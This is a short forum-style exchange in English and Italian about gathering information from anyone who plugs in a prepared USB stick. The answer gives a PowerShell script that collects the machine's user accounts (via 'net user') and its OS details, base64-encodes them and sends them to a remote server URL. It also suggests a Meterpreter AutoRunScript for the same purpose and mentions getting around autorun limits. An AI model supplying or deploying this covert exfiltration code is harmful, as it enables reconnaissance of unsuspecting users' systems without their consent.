the catch here is that I have to only get only the (non damaging) info of the computer/user who inserts the USB and not directly access their system
Da ciò capisco che vuoi solo alcune sysinfo, non le credenziali effettive.
Script PowerShell per la pubblicazione delle informazioni in una pagina:
$userinfo = net user
$sysinfo = Get-CimInstance Win32_OperatingSystem
$Text = $sysinfo + $userinfo
$Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
$USERDATA =[Convert]::ToBase64String($Bytes)
Invoke-WebRequest http://www.yourserver.com/submit?userdata=$USERDATA
Si prega di tenere presente che ci sono alcune limitazioni intorno alla politica di esecuzione. Penso che una soluzione molto più robusta sarebbe un Meterpreter con un AutoRunScript che raccoglie le informazioni degli utenti e termina immediatamente.
Anche il computer moderno non esegue più automaticamente autorun.inf, probabilmente avrai bisogno di un po 'di interazione con l'utente.